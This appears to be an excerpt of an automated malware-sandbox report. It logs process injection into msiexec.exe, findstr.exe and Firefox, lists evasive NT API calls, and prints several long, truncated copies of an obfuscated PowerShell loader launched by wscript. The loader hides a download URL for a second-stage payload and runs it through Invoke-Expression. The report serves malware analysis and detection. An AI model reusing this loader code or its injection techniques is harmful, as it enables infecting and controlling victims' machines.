              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EDF7AF mov eax, dword ptr fs:[00000030h]16_2_02EDF7AF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EDF7AF mov eax, dword ptr fs:[00000030h]16_2_02EDF7AF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EDF7AF mov eax, dword ptr fs:[00000030h]16_2_02EDF7AF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F237B6 mov eax, dword ptr fs:[00000030h]16_2_02F237B6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED97A9 mov eax, dword ptr fs:[00000030h]16_2_02ED97A9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E507AF mov eax, dword ptr fs:[00000030h]16_2_02E507AF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7D7B0 mov eax, dword ptr fs:[00000030h]16_2_02E7D7B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F7BA mov eax, dword ptr fs:[00000030h]16_2_02E4F7BA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0F78A mov eax, dword ptr fs:[00000030h]16_2_02F0F78A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B765 mov eax, dword ptr fs:[00000030h]16_2_02E4B765
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B765 mov eax, dword ptr fs:[00000030h]16_2_02E4B765
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B765 mov eax, dword ptr fs:[00000030h]16_2_02E4B765
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4B765 mov eax, dword ptr fs:[00000030h]16_2_02E4B765
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E58770 mov eax, dword ptr fs:[00000030h]16_2_02E58770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60770 mov eax, dword ptr fs:[00000030h]16_2_02E60770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60770 mov eax, dword ptr fs:[00000030h]16_2_02E60770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60770 mov eax, dword ptr fs:[00000030h]16_2_02E60770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60770 mov eax, dword ptr fs:[00000030h]16_2_02E60770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60770 mov eax, dword ptr fs:[00000030h]16_2_02E60770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60770 mov eax, dword ptr fs:[00000030h]16_2_02E60770

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_1488.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1488, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTR
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtQuerySystemInformation: Direct from: 0x772748CCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtQueryVolumeInformationFile: Direct from: 0x77272F2CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtOpenSection: Direct from: 0x77272E0CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtClose: Direct from: 0x77272B6C
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtCreateKey: Direct from: 0x77272C6CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtReadVirtualMemory: Direct from: 0x77272E8CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtSetInformationThread: Direct from: 0x77272B4CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtQueryAttributesFile: Direct from: 0x77272E6CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtAllocateVirtualMemory: Direct from: 0x772748ECJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtSetInformationThread: Direct from: 0x77272ECCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtQueryInformationToken: Direct from: 0x77272CACJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtOpenKeyEx: Direct from: 0x77272B9CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtDeviceIoControlFile: Direct from: 0x77272AECJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtAllocateVirtualMemory: Direct from: 0x77272BECJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtCreateFile: Direct from: 0x77272FECJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtOpenFile: Direct from: 0x77272DCCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtWriteVirtualMemory: Direct from: 0x77272E3CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtMapViewOfSection: Direct from: 0x77272D1CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtResumeThread: Direct from: 0x772736ACJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtProtectVirtualMemory: Direct from: 0x77272F9CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtSetInformationProcess: Direct from: 0x77272C5CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtTerminateProcess: Direct from: 0x77272D5CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtNotifyChangeKey: Direct from: 0x77273C2CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtCreateMutant: Direct from: 0x772735CCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtQueryInformationProcess: Direct from: 0x77272C26Jump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtResumeThread: Direct from: 0x77272FBCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtCreateUserProcess: Direct from: 0x7727371CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtWriteVirtualMemory: Direct from: 0x7727490CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtAllocateVirtualMemory: Direct from: 0x77273C9CJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtAllocateVirtualMemory: Direct from: 0x77272BFCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtReadFile: Direct from: 0x77272ADCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtQuerySystemInformation: Direct from: 0x77272DFCJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeNtDelayExecution: Direct from: 0x77272DDCJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeSection loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeThread register set: target process: 1400Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 2CD0000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZooJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeProcess created: C:\Windows\SysWOW64\poqexec.exe "C:\Windows\SysWOW64\poqexec.exe"Jump to behavior
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $sirupperne; function rundingers($frygtet){$totalafholdsmndenes=4;do{$utopographer+=$frygtet[$totalafholdsmndenes];$totalafholdsmndenes+=5;$floss=format-list} until(!$frygtet[$totalafholdsmndenes])$utopographer}function exaltative($skriv){ .($monoprionidian) ($skriv)}$gylpenes=rundingers ',endnmed e raatbrug.fronw';$gylpenes+=rundingers 'timee ,rsblderclng ltrani assep stn envt';$gensidige=rundingers 'd cim bidobiblz friie.ecl la.l fera ha /';$turf=rundingers 'bjnitbaldl dogsland1ecty2';$dopingens='rens[c ten p oe ddatprea. b,dstopder harphilv haiservctidsemantpalano.ervi ndinrebetabdimhallas,emn ovoahis.gar.ie vikr.wel]heat: nem:unshsversereklcde.ruskonr,edsichaztexscybritp r.vrthumofla t gitoanaucgloboafkol,ept=inte$su,ktspa.uskrmrlockf';$gensidige+=rundingers 'beha5fold. ste0,ive fors(aktiw estiudflndoktdsansoundsw apas til afkln he tsyne vejn1dist0neos.deka0li j; ret klebwpupiieloknyayb6f uo4mark;tart m.ttxspor6loc 4vite;u do lystr sa,vlab,:prod1come3mant4ra e.bomb0sani)en a leg g kaveub,tcangrk insopor./.rea2macr0str,1u,de0supe0zinc1yach0bred1alab r tftikhihurtr rihenordf ongolastxlgtn/h,pn1s.rp3unde4urin.grad0';$mellemtekst=rundingers 'freuu nisdaraesuper s.l-udslaimprg dise kronnonit';$afskrabede=rundingers 'per.hkbintk,ittpolipan esh,nd:band/opda/pawkd skartraniaporv ampeelem.kpengresto eneo kokgeaenlsporenonf.copucker oresempre /depiurececpret?skaaesym,xbugbp oraoadvorbaksthect= l.sdsc oos xewgenen ab lupstovagiared dpaup&kvi ipsaldmiss= dag1 bedgflakfbourxs re5antac ,rucst gu da.z ricpchr qarc 6h peetra r.kvigvallr unfokortqtekncsnitkensi4 anasr gnkirefqrverr ulig afgyflaa9kalkuemu w t,r6bixb8hjor4';$pyrotoxin=rundingers ' gas>';$monoprionidian=rundingers ' debitheoe fo,x';$underbevelling='hestestutterier';$thyrostraca='\linieskifte.rig';exaltative (rundingers ' s.j$chemgkroplincioraspbsadeasg.nlim.r: pendmisteskrinunsyu absdsietiunconbringmagn=.mpr$ advebregnajugvs or:sek aflamp genp urgdlystaelect .arating+loch$musitdik,h bufysp drsterorigtsbreftdrt rdelfai ric ad.a');exaltative (rundingers ' for$ atugbyggl pulotil bs riafroklcit :,abad arpoyau.mgenailsn,n oinib ctkgelda ,linsys s m fkpushefl v=hexa$vap ak llfsmaasru dksjlerjazzaunlybhoveekonfdtilsetric.sekssad,lpstillrotuimelata,ti(bejl$nevypmarky lacrstero ugetd leo balxmutai u cndelt)');exaltative (rundingers $dopingens);$afskrabede=$dominikanske[0];$tobiser=(rundingers 'di,t$landgreselarchoisaabimp aalarlf ee: outaspi h ilfmboele,koldolefs inv=chaintacke ordwjg r- euaodegrb soljfykeecleacjdertarki p ess nnoy.ktas hotfasee vidm gl .cum $murpgklu ygalolbalupgensesystnfor etaros');exaltative ($tobiser);exaltative (rundingers ' .ng$ mea s ihnajem le eudvedboulsma.r.disihs rae u gaflatdres eindtr stossolm[pasc$ di mtekneunrel scrl re eobelmgodst ch.e hypk presundetc jo] ada=hold$bowlgsvejeabonn .ers w.tiraindproji jusgmidde');$siwash=rundingers 'prv,$v,ssazoo
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "echo $sirupperne; function rundingers($frygtet){$totalafholdsmndenes=4;do{$utopographer+=$frygtet[$totalafholdsmndenes];$totalafholdsmndenes+=5;$floss=format-list} until(!$frygtet[$totalafholdsmndenes])$utopographer}function exaltative($skriv){ .($monoprionidian) ($skriv)}$gylpenes=rundingers ',endnmed e raatbrug.fronw';$gylpenes+=rundingers 'timee ,rsblderclng ltrani assep stn envt';$gensidige=rundingers 'd cim bidobiblz friie.ecl la.l fera ha /';$turf=rundingers 'bjnitbaldl dogsland1ecty2';$dopingens='rens[c ten p oe ddatprea. b,dstopder harphilv haiservctidsemantpalano.ervi ndinrebetabdimhallas,emn ovoahis.gar.ie vikr.wel]heat: nem:unshsversereklcde.ruskonr,edsichaztexscybritp r.vrthumofla t gitoanaucgloboafkol,ept=inte$su,ktspa.uskrmrlockf';$gensidige+=rundingers 'beha5fold. ste0,ive fors(aktiw estiudflndoktdsansoundsw apas til afkln he tsyne vejn1dist0neos.deka0li j; ret klebwpupiieloknyayb6f uo4mark;tart m.ttxspor6loc 4vite;u do lystr sa,vlab,:prod1come3mant4ra e.bomb0sani)en a leg g kaveub,tcangrk insopor./.rea2macr0str,1u,de0supe0zinc1yach0bred1alab r tftikhihurtr rihenordf ongolastxlgtn/h,pn1s.rp3unde4urin.grad0';$mellemtekst=rundingers 'freuu nisdaraesuper s.l-udslaimprg dise kronnonit';$afskrabede=rundingers 'per.hkbintk,ittpolipan esh,nd:band/opda/pawkd skartraniaporv ampeelem.kpengresto eneo kokgeaenlsporenonf.copucker oresempre /depiurececpret?skaaesym,xbugbp oraoadvorbaksthect= l.sdsc oos xewgenen ab lupstovagiared dpaup&kvi ipsaldmiss= dag1 bedgflakfbourxs re5antac ,rucst gu da.z ricpchr qarc 6h peetra r.kvigvallr unfokortqtekncsnitkensi4 anasr gnkirefqrverr ulig afgyflaa9kalkuemu w t,r6bixb8hjor4';$pyrotoxin=rundingers ' gas>';$monoprionidian=rundingers ' debitheoe fo,x';$underbevelling='hestestutterier';$thyrostraca='\linieskifte.rig';exaltative (rundingers ' s.j$chemgkroplincioraspbsadeasg.nlim.r: pendmisteskrinunsyu absdsietiunconbringmagn=.mpr$ advebregnajugvs or:sek aflamp genp urgdlystaelect .arating+loch$musitdik,h bufysp drsterorigtsbreftdrt rdelfai ric ad.a');exaltative (rundingers ' for$ atugbyggl pulotil bs riafroklcit :,abad arpoyau.mgenailsn,n oinib ctkgelda ,linsys s m fkpushefl v=hexa$vap ak llfsmaasru dksjlerjazzaunlybhoveekonfdtilsetric.sekssad,lpstillrotuimelata,ti(bejl$nevypmarky lacrstero ugetd leo balxmutai u cndelt)');exaltative (rundingers $dopingens);$afskrabede=$dominikanske[0];$tobiser=(rundingers 'di,t$landgreselarchoisaabimp aalarlf ee: outaspi h ilfmboele,koldolefs inv=chaintacke ordwjg r- euaodegrb soljfykeecleacjdertarki p ess nnoy.ktas hotfasee vidm gl .cum $murpgklu ygalolbalupgensesystnfor etaros');exaltative ($tobiser);exaltative (rundingers ' .ng$ mea s ihnajem le eudvedboulsma.r.disihs rae u gaflatdres eindtr stossolm[pasc$ di mtekneunrel scrl re eobelmgodst ch.e hypk presundetc jo] ada=hold$bowlgsvejeabonn .ers w.tiraindproji jusgmidde');$siwash=rundingers 'prv,$v,ssazoo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "echo $sirupperne; function rundingers($frygtet){$totalafholdsmndenes=4;do{$utopographer+=$frygtet[$totalafholdsmndenes];$totalafholdsmndenes+=5;$floss=format-list} until(!$frygtet[$totalafholdsmndenes])$utopographer}function exaltative($skriv){ .($monoprionidian) ($skriv)}$gylpenes=rundingers ',endnmed e raatbrug.fronw';$gylpenes+=rundingers 'timee ,rsblderclng ltrani assep stn envt';$gensidige=rundingers 'd cim bidobiblz friie.ecl la.l fera ha /';$turf=rundingers 'bjnitbaldl dogsland1ecty2';$dopingens='rens[c ten p oe ddatprea. b,dstopder harphilv haiservctidsemantpalano.ervi ndinrebetabdimhallas,emn ovoahis.gar.ie vikr.wel]heat: nem:unshsversereklcde.ruskonr,edsichaztexscybritp r.vrthumofla t gitoanaucgloboafkol,ept=inte$su,ktspa.uskrmrlockf';$gensidige+=rundingers 'beha5fold. ste0,ive fors(aktiw estiudflndoktdsansoundsw apas til afkln he tsyne vejn1dist0neos.deka0li j; ret klebwpupiieloknyayb6f uo4mark;tart m.ttxspor6loc 4vite;u do lystr sa,vlab,:prod1come3mant4ra e.bomb0sani)en a leg g kaveub,tcangrk insopor./.rea2macr0str,1u,de0supe0zinc1yach0bred1alab r tftikhihurtr rihenordf ongolastxlgtn/h,pn1s.rp3unde4urin.grad0';$mellemtekst=rundingers 'freuu nisdaraesuper s.l-udslaimprg dise kronnonit';$afskrabede=rundingers 'per.hkbintk,ittpolipan esh,nd:band/opda/pawkd skartraniaporv ampeelem.kpengresto eneo kokgeaenlsporenonf.copucker oresempre /depiurececpret?skaaesym,xbugbp oraoadvorbaksthect= l.sdsc oos xewgenen ab lupstovagiared dpaup&kvi ipsaldmiss= dag1 bedgflakfbourxs re5antac ,rucst gu da.z ricpchr qarc 6h peetra r.kvigvallr unfokortqtekncsnitkensi4 anasr gnkirefqrverr ulig afgyflaa9kalkuemu w t,r6bixb8hjor4';$pyrotoxin=rundingers ' gas>';$monoprionidian=rundingers ' debitheoe fo,x';$underbevelling='hestestutterier';$thyrostraca='\linieskifte.rig';exaltative (rundingers ' s.j$chemgkroplincioraspbsadeasg.nlim.r: pendmisteskrinunsyu absdsietiunconbringmagn=.mpr$ advebregnajugvs or:sek aflamp genp urgdlystaelect .arating+loch$musitdik,h bufysp drsterorigtsbreftdrt rdelfai ric ad.a');exaltative (rundingers ' for$ atugbyggl pulotil bs riafroklcit :,abad arpoyau.mgenailsn,n oinib ctkgelda ,linsys s m fkpushefl v=hexa$vap ak llfsmaasru dksjlerjazzaunlybhoveekonfdtilsetric.sekssad,lpstillrotuimelata,ti(bejl$nevypmarky lacrstero ugetd leo balxmutai u cndelt)');exaltative (rundingers $dopingens);$afskrabede=$dominikanske[0];$tobiser=(rundingers 'di,t$landgreselarchoisaabimp aalarlf ee: outaspi h ilfmboele,koldolefs inv=chaintacke ordwjg r- euaodegrb soljfykeecleacjdertarki p ess nnoy.ktas hotfasee vidm gl .cum $murpgklu ygalolbalupgensesystnfor etaros');exaltative ($tobiser);exaltative (rundingers ' .ng$ mea s ihnajem le eudvedboulsma.r.disihs rae u gaflatdres eindtr stossolm[pasc$ di mtekneunrel scrl re eobelmgodst ch.e hypk presundetc jo] ada=hold$bowlgsvejeabonn .ers w.tiraindproji 